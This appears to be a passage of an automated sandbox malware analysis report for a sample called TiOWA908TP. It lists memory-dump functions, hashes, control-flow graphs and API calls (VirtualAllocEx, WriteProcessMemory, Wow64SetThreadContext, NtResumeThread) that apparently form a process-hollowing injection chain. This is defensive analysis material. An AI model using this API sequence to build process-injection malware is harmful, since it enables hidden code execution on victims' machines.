6ced9ba 60260 6ced5e5 60259->60260 60297 5b86d68 60260->60297 60301 5b86d61 60260->60301 60261 6ced568 60261->60236 60265 6ced7c9 60264->60265 60305 5b86af8 60265->60305 60309 5b86af0 60265->60309 60266 6ced849 60270 6ced25d 60269->60270 60272 5b86558 Wow64SetThreadContext 60270->60272 60273 5b86551 Wow64SetThreadContext 60270->60273 60271 6ced28c 60272->60271 60273->60271 60275 6ced498 60274->60275 60276 6cecfb1 60275->60276 60313 5b87388 60275->60313 60317 5b87383 60275->60317 60276->60236 60280 6ced7ad 60279->60280 60282 5b86af8 VirtualAllocEx 60280->60282 60283 5b86af0 VirtualAllocEx 60280->60283 60281 6ced849 60282->60281 60283->60281 60286 6ced97a 60284->60286 60285 6ced9ba 60287 5b86558 Wow64SetThreadContext 60286->60287 60288 5b86551 Wow64SetThreadContext 60286->60288 60287->60285 60288->60285 60290 5b8659d Wow64SetThreadContext 60289->60290 60292 5b865e5 60290->60292 60292->60256 60294 5b8659d Wow64SetThreadContext 60293->60294 60296 5b865e5 60294->60296 60296->60256 60298 5b86db0 WriteProcessMemory 60297->60298 60300 5b86e07 60298->60300 60300->60261 60302 5b86d68 WriteProcessMemory 60301->60302 60304 5b86e07 60302->60304 60304->60261 60306 5b86b38 VirtualAllocEx 60305->60306 60308 5b86b75 60306->60308 60308->60266 60310 5b86af8 VirtualAllocEx 60309->60310 60312 5b86b75 60310->60312 60312->60266 60314 5b873d0 NtResumeThread 60313->60314 60316 5b87405 60314->60316 60316->60276 60318 5b87388 NtResumeThread 60317->60318 60320 5b87405 60318->60320 60320->60276

                                      Executed Functions

                                      Function 05B838D9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65nativeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 113 5b838d9-5b83976 NtProtectVirtualMemory 117 5b83978-5b8397e 113->117 118 5b8397f-5b839a4 113->118 117->118
                                      APIs
                                      • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05B83969
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1699307632.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5b80000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: MemoryProtectVirtual
                                      • String ID: $Gkr
                                      • API String ID: 2706961497-1136909900
                                      • Opcode ID: 4461a90334cfbeca8942ab4c6025482949e1addeee82a24ea8e914ff966c4aff
                                      • Instruction ID: 97ec8a6aaa7726bde396cdca69c1f37f2d4c82f4c92ccd1358394cb43a41b4e5
                                      • Opcode Fuzzy Hash: 4461a90334cfbeca8942ab4c6025482949e1addeee82a24ea8e914ff966c4aff
                                      • Instruction Fuzzy Hash: 4C21F6B5D012099FCB10DFAAD984ADEFBF5FF48310F20842AE919A3240D775A944CFA4
                                      Function 05B838E0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63nativeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 132 5b838e0-5b83976 NtProtectVirtualMemory 135 5b83978-5b8397e 132->135 136 5b8397f-5b839a4 132->136 135->136
                                      APIs
                                      • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05B83969
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1699307632.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5b80000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: MemoryProtectVirtual
                                      • String ID: $Gkr
                                      • API String ID: 2706961497-1136909900
                                      • Opcode ID: f18781fcc1b5ebed8c49731aa6ab9f88023695b1e370cd18ae81501c046dbb3e
                                      • Instruction ID: 84afb1959a22e1ddf8c1289d50b68710e2e153ce69bcb389e229f29e15105cd7
                                      • Opcode Fuzzy Hash: f18781fcc1b5ebed8c49731aa6ab9f88023695b1e370cd18ae81501c046dbb3e
                                      • Instruction Fuzzy Hash: FE2107B5D012099FCB10DFAAD984ADEFBF5FF48310F20842AE519A3240D775A940CFA4
                                      Function 05B87383 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55nativethreadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 175 5b87383-5b87403 NtResumeThread 179 5b8740c-5b87431 175->179 180 5b87405-5b8740b 175->180 180->179
                                      APIs
                                      • NtResumeThread.NTDLL(?,?), ref: 05B873F6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1699307632.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5b80000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID: $Gkr
                                      • API String ID: 947044025-1136909900
                                      • Opcode ID: 2c1827c1dbd0d002d756ff037688dfea2c0630052310b72fb219e58fd46a339b
                                      • Instruction ID: 1f8781a7a8c75c76e977d2ccef8266801b305bc38dc9ef388fd09d0d4f724a66
                                      • Opcode Fuzzy Hash: 2c1827c1dbd0d002d756ff037688dfea2c0630052310b72fb219e58fd46a339b
                                      • Instruction Fuzzy Hash: 981106B5D002498ACB10DFAAC8846AEFBF4EF48310F24842AD519A7240CB79A944CFA5
                                      Function 05B87388 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54nativethreadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 184 5b87388-5b87403 NtResumeThread 187 5b8740c-5b87431 184->187 188 5b87405-5b8740b 184->188 188->187
                                      APIs
                                      • NtResumeThread.NTDLL(?,?), ref: 05B873F6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1699307632.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5b80000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID: $Gkr
                                      • API String ID: 947044025-1136909900
                                      • Opcode ID: e9cfdca4f5c85f5ccded8d8d14f97d51588e9f1fb4b65cb1f7c61b0bf5c45969
                                      • Instruction ID: 36a9fb2407e02c21f9ac227b48e7d2ada857564ac398bae546ab393b63f8e7ce
                                      • Opcode Fuzzy Hash: e9cfdca4f5c85f5ccded8d8d14f97d51588e9f1fb4b65cb1f7c61b0bf5c45969
                                      • Instruction Fuzzy Hash: 7A11E7B5D002498EDB10DFAAC8846EEFBF5EF48310F24842ED419A7240CB79A945CFA5
                                      Function 068F5528 Relevance: 3.5, Strings: 2, Instructions: 983COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1701516965.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_68f0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ,YF$Upt
                                      • API String ID: 0-662607101
                                      • Opcode ID: e0ba79f180352c9e1b1d5985c790a86a08b20a412aa9ac6174457577599b7ad1
                                      • Instruction ID: c2ddd1edd0c80d283bc8684da7ddb39020009a88194efe3a87248153eb32ee5f
                                      • Opcode Fuzzy Hash: e0ba79f180352c9e1b1d5985c790a86a08b20a412aa9ac6174457577599b7ad1
                                      • Instruction Fuzzy Hash: 1FA2C475A10228CFDB64CF69C984A9DBBB2FF89304F1581E9D509AB365DB319E81CF40
                                      Function 069127A0 Relevance: 3.3, Strings: 1, Instructions: 2088COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1701571900.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6910000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4mNq
                                      • API String ID: 0-1476053944
                                      • Opcode ID: 4bd468d135ab9b8de14efb7bec5b90e5a2b0cde97790f9b0ab12f15ebda0fb8c
                                      • Instruction ID: a76f0e536e5cc9f7c5448f70f46bbb7104cd783450c3f3e305f842cf2a4c27d3
                                      • Opcode Fuzzy Hash: 4bd468d135ab9b8de14efb7bec5b90e5a2b0cde97790f9b0ab12f15ebda0fb8c
                                      • Instruction Fuzzy Hash: CA03B274D09388DFDB16CBA8CC55BAE7FB5AF46300F25449AE141AF2A2C7345C45CBA2
                                      Function 068F7930 Relevance: 2.6, Strings: 1, Instructions: 1339COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1701516965.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_68f0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2
                                      • API String ID: 0-450215437
                                      • Opcode ID: 3b7f0508066149c8621fb0250becf13ac6ffd4444ba46800411bce456aa5bc3d
                                      • Instruction ID: 808b91d6ec52b318b0284cc5d92d31bf7521c54d3960c7d0122b5e0908d7af17
                                      • Opcode Fuzzy Hash: 3b7f0508066149c8621fb0250becf13ac6ffd4444ba46800411bce456aa5bc3d
                                      • Instruction Fuzzy Hash: CDE2E278A012288FCB65DF69D894B9ABBF6FB89305F1081EAD50DA7345DB305E85CF40
                                      Function 05B80488 Relevance: 1.9, Strings: 1, Instructions: 613COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1699307632.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5b80000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 8
                                      • API String ID: 0-4194326291
                                      • Opcode ID: 2b8ea65dc68f9010404ba2dfd2a19f73bc497d97c176c27ebc97e4b4f88e76e2
                                      • Instruction ID: ee8b0e83cbddb62376840d371717176a6a3ad0a03cb5cfc73aa5092d28aa3ccc
                                      • Opcode Fuzzy Hash: 2b8ea65dc68f9010404ba2dfd2a19f73bc497d97c176c27ebc97e4b4f88e76e2
                                      • Instruction Fuzzy Hash: C352D775D002298FDB64DF69C854AD9B7B2FB89300F1486EAD90DA7354DB30AE85CF90
                                      Function 05B80479 Relevance: 1.4, Strings: 1, Instructions: 167COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1699307632.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5b80000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: h
                                      • API String ID: 0-2439710439
                                      • Opcode ID: f7f87f235121576574ec10e53f0cb8929ca9d03bb1c025ed7b0479df6786a108
                                      • Instruction ID: 90a2a94407a0406c18f1b7719238fefa249e8c2d9898ef4797eaa3891699edc5
                                      • Opcode Fuzzy Hash: f7f87f235121576574ec10e53f0cb8929ca9d03bb1c025ed7b0479df6786a108
                                      • Instruction Fuzzy Hash: 3271E575E016298FDB64EF69C850BDAB7B2FF88304F1482AAD50DA7254DB306E85CF50
                                      Function 06DEF930 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1703053739.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6dd0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: fQ
                                      • API String ID: 0-3620927468
                                      • Opcode ID: dad35e417163e86fdb774e7a6c0479f71bbff24f9bfe6138c9dbfc6c9791e578
                                      • Instruction ID: 058062436a9e1c8ead32304e1eeb128f5440bead71a6a0bd6290d15941d040cb
                                      • Opcode Fuzzy Hash: dad35e417163e86fdb774e7a6c0479f71bbff24f9bfe6138c9dbfc6c9791e578
                                      • Instruction Fuzzy Hash: F4512974E0411ADFDB44DFA9D980AAEBBF2FF88304F148529E459EB344D7389941CB91
                                      Function 06CC9EB8 Relevance: .8, Instructions: 791COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1702938801.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6cc0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f48b0940c8158d6e74be08da00b8820a4cbea8538498765bc3842159554a5ad6
                                      • Instruction ID: b84303431c13fe7ffc68e3d37b391ae7454da9b58d0650978340aef040efa4c2
                                      • Opcode Fuzzy Hash: f48b0940c8158d6e74be08da00b8820a4cbea8538498765bc3842159554a5ad6
                                      • Instruction Fuzzy Hash: B2627874A006198FCB54CFA9C498A6EFBF2FF88310F24852DE556DB790DB34A945CB81
                                      Function 068F92A3 Relevance: .5, Instructions: 539COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1701516965.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_68f0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: faa522b26dcfc789bdd7efb0ef3745abfdaf12233aa08932951bd3a6b173f39d
                                      • Instruction ID: 45554854576c4346132879fd7042dfa9c45a4ee0ef86cfe6db82022a085f70fb
                                      • Opcode Fuzzy Hash: faa522b26dcfc789bdd7efb0ef3745abfdaf12233aa08932951bd3a6b173f39d
                                      • Instruction Fuzzy Hash: 8552A374A142298FCB64DF28C994B9AB7F6FB88305F1081E9D90DA7355DB30AE81CF51
                                      Function 05B85658 Relevance: .4, Instructions: 429COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1699307632.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5b80000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: db20d0fb6b87e537c569fdf4356b2e99684a92d34798441e1439ece7450cdf52
                                      • Instruction ID: e9030d9000103e0d4b992b5d30ecfe0513a0cdcff0bdb3bb331ca41ef6b1c1fc
                                      • Opcode Fuzzy Hash: db20d0fb6b87e537c569fdf4356b2e99684a92d34798441e1439ece7450cdf52
                                      • Instruction Fuzzy Hash: CE12F574D45228DFDB60EFA9C884BADBBF2FB49304F24A1E9D409A7284D7746985CF10
                                      Function 06C59990 Relevance: .4, Instructions: 410COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1702709092.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6c50000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b53dd3905e0b1481ca0b29ebac0fee304f8bdefebb8132ecabd045298734c4ec
                                      • Instruction ID: 8d2d3bd301e896f37af61b879d1b3ab15234adc9d0f6d21f8d06318bcb6d255b
                                      • Opcode Fuzzy Hash: b53dd3905e0b1481ca0b29ebac0fee304f8bdefebb8132ecabd045298734c4ec
                                      • Instruction Fuzzy Hash: BA020374E05268CFEBA4DF6AC844BA9B7B2FB89300F1181A9D80DA7354DB745AC5CF44
                                      Function 05B8564B Relevance: .4, Instructions: 405COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1699307632.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5b80000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ecfc006260da055f2040b5cb4b27192e396262e8a45e19bb3ef81858dd90bade
                                      • Instruction ID: 865c2e120d16d26e6ce2c22f58a410d4a4e9f2c11dda7de6ce34ffe37c7fa3e3
                                      • Opcode Fuzzy Hash: ecfc006260da055f2040b5cb4b27192e396262e8a45e19bb3ef81858dd90bade
                                      • Instruction Fuzzy Hash: D6020674D45228DFDB60EF69C884BADBBF2FB49304F24A1E9D409A7284D7746985CF10
                                      Function 06C59980 Relevance: .4, Instructions: 404COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1702709092.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6c50000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3d91640260f29789c2ddac10f213e0f43b43eb3acca9dac4f70827ff38a66e77
                                      • Instruction ID: 5617a546086a6af118de4070ccdabc79a1e8ba4408640a7344038fecf604d9f0
                                      • Opcode Fuzzy Hash: 3d91640260f29789c2ddac10f213e0f43b43eb3acca9dac4f70827ff38a66e77
                                      • Instruction Fuzzy Hash: C5021374E05258CFEBA4DF6AC844BA9B7B2FB89300F1181A9D809A7354DB745EC5CF44
                                      Function 05B85D88 Relevance: .4, Instructions: 373COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1699307632.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5b80000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 95c1f47a0dcf58847e331368980dde0bab35bbb6dd4ac16f3bdb0c817eff80d3
                                      • Instruction ID: 259f5162ae179d4ccfbd09cbc9715a44044763cdefda578b60be3142ff5e716b
                                      • Opcode Fuzzy Hash: 95c1f47a0dcf58847e331368980dde0bab35bbb6dd4ac16f3bdb0c817eff80d3
                                      • Instruction Fuzzy Hash: 3002D474D45228DFDB60EF69C884BADBBF2FB49304F24A1E9D809A7284D7746985CF10
                                      Function 06CCF50A Relevance: .3, Instructions: 323COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1702938801.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6cc0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: afaa17c5598093994ac456f26b58e2cc76e325a60db161913cac1b78a2177d86
                                      • Instruction ID: 7c847e285526a2f5c022ac4ba82a06bdadcaf03910dc5a564020f82de31259a6
                                      • Opcode Fuzzy Hash: afaa17c5598093994ac456f26b58e2cc76e325a60db161913cac1b78a2177d86
                                      • Instruction Fuzzy Hash: 11E10374E04218CFEB54CFAAD840BADBBB2FF89314F2081AED419A7255DB345A85CF40
                                      Function 06CCF552 Relevance: .3, Instructions: 319COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1702938801.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6cc0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 65d72d85283d64df460734eb9406ddc24d8beeb09df02f03040ac01f7d7d699f
                                      • Instruction ID: d9a4a4f42ea876d127032f3bbb450fafe1a96b781a5d6764af65def3cf548ada
                                      • Opcode Fuzzy Hash: 65d72d85283d64df460734eb9406ddc24d8beeb09df02f03040ac01f7d7d699f
                                      • Instruction Fuzzy Hash: 5FD1F374E04218CFEB54DFAAD844BADBBB2FF89314F2081AED419A7254DB745A85CF40
                                      Function 06CCF560 Relevance: .3, Instructions: 318COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1702938801.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6cc0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d10503b8c038cc7cbd44a11039aff0afeb1cf430455aaca2d176943db8f6a1d0
                                      • Instruction ID: 6fa2dd8072002e6485cbb6b3e1f573c6baf1e91611e399f4b5cbe2dd1fa110a8
                                      • Opcode Fuzzy Hash: d10503b8c038cc7cbd44a11039aff0afeb1cf430455aaca2d176943db8f6a1d0
                                      • Instruction Fuzzy Hash: 70D1F274E04218CFEB54DFAAD844BADBBB2FF89314F2080AED419A7254DB745A85CF40
                                      Function 05CA33FF Relevance: .3, Instructions: 279COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1699653252.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ca0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e084634ef39e052209be483a3ad042abee40e3ec903b4d3c4a7c8a9510f22b4a
                                      • Instruction ID: 27bb520ab9d8580263e651719b1f6c78ae3fe98e59f87066b29d8dbfed09e41b
                                      • Opcode Fuzzy Hash: e084634ef39e052209be483a3ad042abee40e3ec903b4d3c4a7c8a9510f22b4a
                                      • Instruction Fuzzy Hash: D6C1F8B1D0924ACFDB14CF9AC598BEEBBF2FB46718F509855D416A7280C7784A46CF80
                                      Function 068FFA08 Relevance: .3, Instructions: 276COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1701516965.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_68f0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 43ece856f11ba68bce7e4ffb6420b53d5ae455c74367d933539d5c8e68d9f0d9
                                      • Instruction ID: 6154596b14cbb9d5ad0e0b537d8814610d060018c4ed910be3f968d4a41b05c5
                                      • Opcode Fuzzy Hash: 43ece856f11ba68bce7e4ffb6420b53d5ae455c74367d933539d5c8e68d9f0d9
                                      • Instruction Fuzzy Hash: 37D19574E10229CFDB54DFA9D894A9DBBB2BF88300F1081A9D909AB365DB319D85CF50
                                      Function 06CEB2A8 Relevance: .3, Instructions: 269COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1702991156.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6ce0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 478468afc742bdd2317a66304a8f4c0a966da907df5b280c3884a971a05f1b72
                                      • Instruction ID: 182395c13cbae2b743a317bb149ee80b378040d7fc19d7655f00aa8bcd37e3fa
                                      • Opcode Fuzzy Hash: 478468afc742bdd2317a66304a8f4c0a966da907df5b280c3884a971a05f1b72
                                      • Instruction Fuzzy Hash: E1C11474E05218CFEB94DFAAD994BAEBBB2FB88300F109169D819A7354DB345D85CF40
                                      Function 06CEB29D Relevance: .3, Instructions: 267COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1702991156.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6ce0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c250252725bcaa4fb6208952a7f32a6730f80e328d6bf990dd95df9a1f094483
                                      • Instruction ID: 6a76086477511db3b3a3739a58387551f47e0d7069ed4882b763cf68877487ac
                                      • Opcode Fuzzy Hash: c250252725bcaa4fb6208952a7f32a6730f80e328d6bf990dd95df9a1f094483
                                      • Instruction Fuzzy Hash: 75C11374E05218CFEB94DFAAD994BADBBB2FB88300F109169D819A7354DB345E85CF40
                                      Function 06C5A6F9 Relevance: .2, Instructions: 249COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1702709092.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6c50000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 95e3541ad42acc9b3eb639a0642bb2c978b664f558a58e2f6f2f19ce441b21bd
                                      • Instruction ID: 526ce4e3a4989f0e88bcd96da3635c22891d377f03b36d956bf10fd9f7cf7505
                                      • Opcode Fuzzy Hash: 95e3541ad42acc9b3eb639a0642bb2c978b664f558a58e2f6f2f19ce441b21bd
                                      • Instruction Fuzzy Hash: 56A10474E05228CFEB54CFAAD940B9DBBF2FB89300F1182AAD809A7254DB345D81CF44
                                      Function 06C5A708 Relevance: .2, Instructions: 248COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1702709092.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6c50000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b7f624d6e7cb429fa72d97633815988d73c088733543dca3925470a1ba663c4f
                                      • Instruction ID: b688d62a2fb9701246ee0efad69d2fbe4d6479ae11169d640ec5b51e8b0fcbd2
                                      • Opcode Fuzzy Hash: b7f624d6e7cb429fa72d97633815988d73c088733543dca3925470a1ba663c4f
                                      • Instruction Fuzzy Hash: E2A11474E05228CFEB54CFAAD940B9DBBF2BB89300F1192AAD809A7255DB345D81CF44
                                      Function 06CE3378 Relevance: .2, Instructions: 211COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1702991156.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6ce0000_TiOWA908TP.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8a9f888dff14d16f1492188df03f3754223cd7626c01aa0b174617bbea83bf51
                                      • Instruction ID: 1600be8c6b3842abfd8ba4df49379841e437a195f7701874f4c298e27e9f42f6
                                      • Opcode Fuzzy Hash: 8a9f888dff14d16f1492188df03f3754223cd7626c01aa0b174617bbea83bf51
                                      • Instruction Fuzzy Hash: 13812574E05258CFDB50DFAAD844BADBBB5FB89304F109069D81DA7394CB34A985CF40
                                      Function 05B846D7 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 202processCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 5b846d7-5b84750 2 5b84789-5b847a9 0->2 3 5b84752-5b8475c 0->3 8 5b847ab-5b847b5 2->8 9 5b847e2-5b8481c 2->9 3->2 4 5b8475e-5b84760 3->4 5 5b84762-5b8476c 4->5 6 5b84783-5b84786 4->6 10 5b8476e 5->10 11 5b84770-5b8477f 5->11 6->2 8->9 12 5b847b7-5b847b9 8->12 19 5b8481e-5b84828 9->19 20 5b84855-5b848ca CreateProcessA 9->20 10->11 11->11 13 5b84781 11->13 14 5b847bb-5b847c5 12->14 15 5b847dc-5b847df 12->15 13->6 17 5b847c9-5b847d8 14->17 18 5b847c7 14->18 15->9 17->17 21 5b847da 17->21 18->17 19->20 22 5b8482a-5b8482c 19->22 30 5b848cc-5b848d2 20->30 31 5b848d3-5b8491b 20->31 21->15 24 5b8482e-5b84838 22->24 25 5b8484f-5b84852 22->25 26 5b8483a 24->26 27 5b8483c-5b8484b 24->27 25->20 26->27 27->27 29 5b8484d 27->29 29->25 30->31 36 5b8492b-5b8492f 31->36 37 5b8491d-5b84921 31->37 39 5b8493f-5b84943 36->39 40 5b84931-5b84935 36->40 37->36 38 5b84923 37->38 38->36 42 5b84953 39->42 43 5b84945-5b84949 39->43 40->39 41 5b84937 40->41 41->39 45 5b84954 42->45 43->42 44 5b8494b 43->44 44->42 45->45
                                      APIs
                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05B848BA
                                      Strings
                                      Memory Dump Source
